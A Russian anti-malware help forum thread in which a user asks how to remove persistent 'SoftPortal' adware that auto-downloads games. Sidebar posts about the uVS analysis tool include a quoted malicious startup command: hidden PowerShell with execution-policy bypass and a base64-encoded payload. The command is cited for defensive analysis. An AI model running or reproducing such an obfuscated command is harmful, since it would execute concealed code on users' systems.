Перейти к содержанию
garikap

Проблема с загрузкой и папкой SoftPortal

Автор garikap, в Помощь

Recommended Posts

garikap    0

garikap
Опубликовано

Проблема в следующем. Подцепил странную вредоносную программу с которой не справились Касперский, НОД32, Аутпост Файрвол, Маккафи.

Состоит в следующем. В папке Program Files появилась папка SoftPortal. Нашел аналогичные ключи в реестре. Устанавливаю соединение через модем. Когда запускаю IE 6, начинают автоматически загружаться игры типа Luxor. Жрут трафик. А после загрузки запускаются и просят их активировать через мобильник.

Пробовал удалять папку, подозрительные ключи в реестре. При перезагрузке все возвращается в прежнее положение. Сканирование и лечение указанными программами не помогло. Может я что-то неверно делаю?

Как мне избавится от этой вредоносной проги?

iso3.gif

iso2.gif

izo1.gif

post-3824-1190051787.gif

post-1-1190051787.gif

post-1-1190051788.gif

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты
Перейти к списку тем Помощь

  • Сообщения

    • PR55.RP55
      Новые функции в Universal Virus Sniffer (uVS)

      От PR55.RP55 · Опубликовано

      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
      uVS - Тестирование

      От SQx · Опубликовано

    • SQx
      uVS - Тестирование

      От SQx · Опубликовано

      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      uVS - Тестирование

      От demkd · Опубликовано

      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      uVS - Тестирование

      От PR55.RP55 · Опубликовано

      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×